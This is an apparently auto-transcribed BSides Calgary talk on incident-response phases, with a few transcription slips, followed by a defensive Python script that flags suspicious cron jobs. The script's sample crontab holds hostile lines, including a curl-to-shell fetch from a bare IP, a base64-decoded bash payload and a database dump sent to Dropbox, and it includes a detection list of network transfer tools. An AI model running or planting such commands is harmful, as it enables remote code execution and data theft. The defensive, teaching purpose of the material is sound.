
AJLeece

BSides Calgary · 1:29:20 · 309 views · Published 2022-12

Welcome everyone, thanks for coming to BSides 2022. How many of you in here, this is your first conference? And yeah, in general, for a security conference? Yeah, cool, welcome. So I am AJ, I am the managing director of Syntax Security. Our mission is quite simple: we play games and we have fun, and in the same vein we'll teach you something about security along the way. I have my developer here, Nathan, who has done an amazing job taking my initial prototype game, posing all of the AJ alphabet, and then making it actually a whole lot better than it originally was.

So today's session, we're a little bit condensed for time. For what it's worth, the true game really plays out over a couple of hours; it gives us time to sit, talk and explore the scenario. We really don't have that kind of luxury today, because there's just so much amazing content out there for all of you to get to. I don't want to hold you up any longer than I really have to, so I appreciate your attention and your effort. We're going to get through everything just nice and tickety-boo. We actually have a whole new build of the game to show you today, so you're getting the first exclusive look at the latest version of Incidents and Accidents. I call it version four, because the other versions were just so far behind what we've built that this is just really something incredible. But before we get to that, we have some death by PowerPoint, because what's a presentation without a little PowerPoint? So go ahead.

So today's agenda: I'm going to talk a little bit about incident response, because I want you all playing from the same sheet of music. We're going to cover the six main outcomes from incident response, really how the business needs to interact with incident responders, what they need to consider as they're building this plan. Then we're going to get into the gameplay. So like I mentioned before, we're a little condensed on time, so we can't get a full proper game in, because there's just too much cool stuff in here to show you. We're going to run it a little more like a game show and less like a hands-on. Traditionally, in a smaller group, we'd have a bit more of a hands-on thing; this game does scale well to that size, but again, just for the shortage of time, I want to make sure we have a chance to explore a little of everything. So we're going to do a little bit more game show and a little bit less Dungeons and Dragons. It's still going to be good, I promise. If not, well, you know, don't tell anyone.

So a little about me. AJ: I've got some letters after my name, some of them are probably set to expire soon enough. Nathan here is actually a former student of mine from when I was teaching back in the day, and is now a world-class developer who's helping me put this all together. Overall, I'm an information security geek. There really isn't a lot about information security that I don't find interesting to some extent. Yeah, except maybe risk and compliance, but I did my time in those areas, and the paperwork is vital to security programs. The compliance folks play a really, really excellent role in the business, so in the full game sessions there is a role for compliance to play. We do bring them to the incident response ideas, because they have such a vital place to be. Other than that, I'm super into other things within information security, and a super avid gamer, so if any of you like to play, if you'd like to have a good time, you know, hit me up later, we'll find something to do and we'll enjoy it.

So why are we here? Simple: we're just here to have fun, right? There's so many good presentations out there, so much good content, and we're just here to have a good time. We're here to have fun, learn, explore, network and socialize. All these people that you're sitting here with today, we're all attached to the industry in some way, whether it's your first security conference or maybe you're here for your multitudes of security conferences. There's a lot of people in this room, all of whom have very interesting opportunities. This is an opportunity for you to kind of sit and chat and network with them as well. So we're going to be having a good time.

So today we're going to have an incident. In most cases in a business, you're never going to get a heads-up that you're about to have your Friday ruined, and your Saturday ruined, and maybe the next month or two ruined with post-mortem meetings. So today, huzzah, because we're having fun at a conference: yeah, something bad is going to happen to a company. Fortunately, none of us have a real strong stake in it; nobody has any shares of it or anything like that, so the impact is completely fictional. But the scenario is real. Everything that is conceived here, that we're about to talk about today, was born out of "this is how it could happen," and the logic all goes up. So again, don't worry about it. If you're feeling a little bit like "oh, the impact," don't worry about it. There is no real business; no actual ones and zeros were harmed in the making of this. But our goal is simple: we want to resolve the incident and get the business back online.

So there are some session considerations. Again, just because we have a shortage of time, we've stripped out a whole ton of cool stuff. It's really cool, I can't wait to tell you about it at the end. As with new technology, though, this is beta. This is a beta test; you're all beta testing this today, so welcome, thank you very much for the effort, but welcome to the bleeding edge. So sometimes things go horribly wrong. We're not anticipating any of those moments today; we went ahead and squashed most of them when we were working through this. So I didn't have music; that would have been a good idea. As with all of my sessions, questions are absolutely encouraged, so you're under no obligation to censor yourself when it comes to questions about this. The only bad question is the one that you didn't actually ask, right? So no matter what, somebody somewhere is going to find some use of it. Please go ahead, ask any questions that you have. We can pause, we can move on if we have to, come back to them later on, no worries. I'm around, we'll make it work.

So let's talk about incident response. It is a never-ending story. Most of the time you are putting out fires; it is usually a bit harrowing and a little bit stressful. So here's some basics that you can keep in the back of your head. No matter what role you play in an incident response team, if you're even a part of it, there is something here that you'll find useful, I promise.

So first, let's get some common definitions going. So we have events, and we'll get to the next definition that matters. An event is basically just information that's relevant to something within the business, something within information security. Events happen all the time. Believe it or not, some of you have probably looked at a bunch of these and maybe have forgotten. If you're brand new to this information security space, turn on logging sometime and just see how noisy it gets, and just watch that all flood in and take down your hard drives. You'll see these, so do so carefully. But with events, we lack a lot of the context around what happened. The event itself is just simply an indicator of something happening; we don't really know why or how, or if it's good, bad or even. So for that we have to look towards some other definition. So when we talk about incidents, incidents really dovetail into this intent to do harm, malicious activity: an event that correlates to some kind of malice, or some kind of bad actor doing something malicious within our midst. In short, if you click it, the secret ingredient is fine. That's really what it is: it's basically somebody is looking to do something malicious on our network, and the events tell the story of how that happens.

So for the audience: a failed login attempt, is that an incident or an event? An event, yeah, absolutely. Next, what about a malware outbreak? Yeah, you bet. What about an antivirus service that's been stopped on a host? Oh, I'll take a poll, right, because we lack the context around it. Administrators will stop AV services to install software all the time. Monitoring tools and malware actually share a lot of similar taxonomy: if a monitoring tool is grabbing your CPUs, services, OS information, logged-on users, all that really cool stuff, and sending it to a command and control server, or rather their central server (replace "command and control" with "their central server"), you know, when you think about it, malware acts differently, right? It would behave similarly, so it really doesn't. What about a DDoS? Yeah, that's it, right? There's no legitimate use for that. Although, funny story, I remember when Michael Jackson passed, apparently a lot of the news websites were experiencing a massive flood of traffic that started to look like DDoS attacks, just purely based off of how breaking that news was. So I guess it's important to really analyze the traffic, the headers, the information that's coming into your network, so that you can define whether or not you're truly under attack or just getting some kind of hug of death. What about a large upload to an unknown location? Okay, who says incident? One, two, three, four, okay. An event? Yeah, it's an event, because we lack the context around why that upload happened. Large uploads to Dropbox happen all the time. Attackers will also leverage those same services, for what that's worth; they're free, they're available, and by and large they're approved within the business. So a large upload to an unknown location should likely be investigated as a potential problem, because you want to understand the data that went out, combined with where it went to, who put it up there, and in what capacity. Okay, everyone come on in.

So when we're talking about incident response, we have a few desired outcomes that we want to achieve, anywhere within the business, wherever we can. Preparation is obviously the very first step. Preparation is mandatory when it comes to incident response. If you're an IR team, or you're a SOC manager, or you're some kind of security professional, one of the things you kind of always want to do is just sort of be prepared for the next incident. We'll cover how. So make sure that you are ready, prepared and able to action any of this as it comes out, because again, nobody's going to warn you that an incident is inbound, unless maybe you're getting a red team exercise. So make sure that you're adequately prepared. From there (nope, go back), from there you want to identify all the compromised assets. This is called getting the scope of your compromise. You want to understand all of the potentially affected assets within your environment, because you have to move to contain them away from the rest of the network. How you contain them is entirely up to you; we'll cover that in just a minute. But realistically, what you do is you find all of the problem areas of the incident, you go ahead and isolate them, you then eradicate the threats that you found in the process of doing your investigation, and you recover the assets to bring the business back online. And then you spend a whole pile of time in meetings with C-level executives trying to discuss how to prevent this further. Hopefully some of that advice gets taken into consideration, but at the very least you learned something along the way, hopefully to avoid this in the future.

So we talk preparation. You'll never rise to the occasion; anybody who says they will, they certainly won't. The reason being is you'll only fall to your lowest level of preparation. So if all of your tools are missing, if you haven't worked on some of this stuff in a while, if you are new to it and you haven't practiced, whatever that preparation looks like, it's important to keep that going as best you can, because when an incident hits, time is really critical, and the more that you can do to move this along in a way that doesn't really impact the business too much, the better it is for you. So all of that preparation shows up. So make sure that your tools are sanitized; that goes right hand in hand with your forensics media. If you're fortunate enough to have in-house forensics, they should already be handling this, but it's not a guarantee, so it is something to just kind of follow up with whoever's in charge of that, if it happens to be you, if you're doing some of that, because that becomes really important as part of your evidence gallery. And then of course, make sure you have a clean shirt and maybe you've gotten a little bit of sleep. Incidents take a while. I remember locking myself in an office once upon a time for 12, 14 hours working an incident at a client with ransomware, and it started to smell like a petting zoo pretty quick, so definitely going with it was really good.

This is actually a really important one, I want to highlight this one specifically: documentation available in multiple places. How many of you have a documentation repository inside your business? That's actually a bigger number than I thought, yeah, cool. So how many of you have that documentation replicated in different spaces, in the event that central repository is somehow down? Yeah, that's more like it. So have that resilient documentation, because your standard operating procedures in an incident, those are what people are going to be following, and those are what everyone's going to defer back to when it comes to your training and your development. So make sure that your documentation is available in different places wherever you can, make sure it's up to date in both directions, whatever that looks like within the business, and make sure that you're following them.

So with regards to identification, it's quite simple: you're going to get it from many sources. The initial genesis of an event can come from a phone call from somebody through the help desk: "hey, I went to this web page and I'm starting to get all these weird redirects and now the request won't complete," or "hey, I went to go install this tool and the antivirus software turned itself off and now I have this problem." So you're going to get all these notifications from all these different directions. It's important to be aware of where those can come from and keep an eye on them. For any of the SOC analysts in the room, identification sources are primarily alerts, and they're very noisy and they're tedious to follow up, so I do appreciate the work that we do. But when you're looking through any of those alerts, try and correlate some of them to some of the others. If you're seeing some activity on one host and some other activity on another host, but it kind of looks like it might be connected, don't be afraid to pull on that thread, because that really goes a long way. But the long and short of it is you're trying to catalog the entire scope of the problem, and the reason for that is that you can document where the entire scope is, because the one thing with incidents is you're going to run into a lot of panic. You're going to run into a lot of everybody wants to set their hair on fire and try and resolve the problem as quickly as possible. Finding all of the mess and documenting it in a way that's clear and unambiguous, flexible within your incident response plan, and available to your incident responders is going to make a big difference whenever you're trying to get this work done, especially so.

Once you've found everything, we now move to containment. This is where we isolate the assets away from the network. There's a few ways to do it; each business is different. Some people can straight up unplug the network cable and life's good; others have to create some kind of special network routing in order to make it so these can't phone out to the internet. But anything that you can do to isolate these devices from your network is vital. You still need to be able to get in and manage them, because some part of your investigation process is going to require you to probably put some hands on a machine in some way, shape or form, whether that's through forensics, whether that's through some kind of console where you're going through and mining some of this information. Depending on the asset, we might just move right to eradication and recovery, where you just pave it, format it and move on. It's all dependent on the business, but whatever you do to contain your assets is really, really important. One thing, though: you want to avoid powering down any assets if you possibly can, because a lot of the attacker surface lives in memory, so you can lose that, right, if you power it down, and it doesn't come back on its own. So if you can avoid powering it off, that's great. Sometimes it's easier said than done. In a lot of cases you might get an incident: "right, I panicked and shut down the computer." Okay, well, so in that case you can either move to forensics if you have skills in-house, or you can start to work on it through some other way, but just isolate it from the network.

So eradication: this is where you're getting rid of the threat to the organization. Because you've contained the threat, you now have isolated all of the potential backlash that can come from it. If your attacker is still latent in the network, they might go "hey, I'm still here," and they'll thrash your backups, or they'll make the damage worse, maybe they'll leak the data. Whatever you can do to minimize that is always useful. So with regards to eradication, you're closing any network back doors you have. One that gets missed quite frequently are automated tasks and scheduled jobs: cron jobs, scheduled tasks in Windows, any automated scripts that might be there. So you want to look for some of those. Just because it looks like it might be legitimate doesn't mean it actually is. So you think about something like a scheduled task that's set to upload a copy of a database to Dropbox. I don't know why you'd ever configure that from a business standpoint, but let's say that exists. You know, don't ignore those kinds of things, because that might be somebody put that there as a temporary solution and now the attacker is abusing it, or the attacker put that there for you and they're continuing to leverage that. So always look for the automated jobs; very, very easy. Any firewall rules: it's not common that firewalls are going to get popped, I mean, they're usually pretty robust, but if somebody put some custom firewall rules in there that you can't track down, make sure that you ask "what are these for? Let's power them down and see what it does to the business." That's a tough conversation to have in a boardroom, by the way, so you kind of have to come ready to go with "we don't know which rules are ours and which ones somebody else might have put there unauthorized." So you might have a bit of a boardroom battle in your midst on that. So remove any unauthorized firewall rules if they exist, especially if they're too permissive. That's going to go a long way.

And then recovery. This is the best part: you get to bring everything back online. Apparently that didn't show up, but this is just "make sure everything looks good," sorry. But basically, when it comes to the recovery phase, this is where you're bringing everything back online. One important note: the data custodians have to, or sorry, the data owners have to sign off on the data and the service being properly configured and ready to go before you bring it back online. Now, in most organizations they might defer to the IT team, who are usually the data custodians, but let's say you have a credit card data breach and the finance department is the one who has to sign off on that. Make sure that they get a chance to look at everything that's in there, verify that all the apps and everything attached are working as expected, the data has the integrity it needs, before you bring it back online and roll it back into the
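The eradication advice above, to go through cron jobs and scheduled tasks and not wave one through just because it looks routine, can be turned into a first-pass triage script. The following is an added example written for this page; it is not code from the talk or from the Incidents and Accidents game. It parses a crontab in the standard five-field format (plus `@reboot`-style entries) and flags the patterns a responder would want a human to look at: uploads to public file-sharing domains (the "database to Dropbox" job from the talk), downloads piped straight into a shell, base64-decoded payloads, jobs running out of temp or hidden directories, and fetches from bare IP addresses. The sample crontab is constructed for the example, the `dbx-upload` helper in it is hypothetical, and the indicator lists are heuristics chosen for illustration, not an authoritative rule set.

```python
import re
from dataclasses import dataclass, field

# Constructed sample crontab (not from a real system). It mixes routine jobs
# with the kind of entries the talk says not to ignore: an "upload the database
# to Dropbox" job, a curl-pipe-sh fetch, a job in /tmp at reboot, and a
# base64-decoded one-liner. The dbx-upload helper is a made-up name.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=ops@example.com
0 2 * * * /usr/local/bin/backup.sh --target /mnt/backup
*/5 * * * * /usr/bin/python3 /opt/monitoring/collect.py
30 3 * * * pg_dump appdb | gzip | /usr/local/bin/dbx-upload https://content.dropboxapi.com/2/files/upload
@reboot /tmp/.x/update.sh
*/10 * * * * curl -s http://203.0.113.7/a.sh | sh
0 * * * * echo aWQ= | base64 -d | bash
"""

# Heuristic indicators (assumptions for this example; tune to your environment).
TRANSFER_TOOLS = re.compile(r"\b(curl|wget|scp|sftp|rclone|rsync|nc|ncat|socat)\b")
SHARE_DOMAINS = re.compile(
    r"(dropbox(api)?\.com|drive\.google\.com|mega\.nz|transfer\.sh|pastebin\.com)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
DECODE_PIPE = re.compile(r"base64\s+(-d|--decode)")
SUSPECT_PATHS = re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/|/\.[^/\s]+/")
RAW_IP_URL = re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}")


@dataclass
class CronEntry:
    schedule: str
    command: str
    findings: list = field(default_factory=list)


def parse_crontab(text):
    """Return CronEntry objects for every job line; skip comments, blanks and VAR=... lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):                 # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)          # five schedule fields, then the command
            if len(parts) < 6:
                continue                         # malformed line; nothing to run
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append(CronEntry(sched, cmd.strip()))
    return entries


def triage(entry):
    """Attach a reason for each indicator the command trips; return the findings list."""
    cmd = entry.command
    checks = [
        (SHARE_DOMAINS, "uploads to a public file-sharing service"),
        (PIPE_TO_SHELL, "pipes downloaded content straight into a shell"),
        (DECODE_PIPE, "decodes base64 at run time (obfuscated payload)"),
        (SUSPECT_PATHS, "runs from a temp or hidden directory"),
        (RAW_IP_URL, "fetches from a bare IP address"),
    ]
    for pattern, why in checks:
        if pattern.search(cmd):
            entry.findings.append(why)
    # A transfer tool on its own is not damning, but the destination must be confirmed.
    if TRANSFER_TOOLS.search(cmd) and not entry.findings:
        entry.findings.append("uses a network transfer tool; confirm destination is approved")
    return entry.findings


def suspicious_jobs(text):
    """Parse and triage a crontab, returning only the entries that need a human look."""
    return [e for e in parse_crontab(text) if triage(e)]


if __name__ == "__main__":
    for job in suspicious_jobs(SAMPLE_CRONTAB):
        print(f"[{job.schedule}] {job.command}")
        for reason in job.findings:
            print(f"    - {reason}")
```

Run against the sample, it leaves the backup and monitoring jobs alone and flags the other four. The point is the one the talk makes: the Dropbox job parses as perfectly well-formed cron and may even have been put there by an admin as a stopgap, so the script only surfaces it for review; deciding whether it is the business's own stopgap or the attacker's exfiltration channel still needs the data owner in the room.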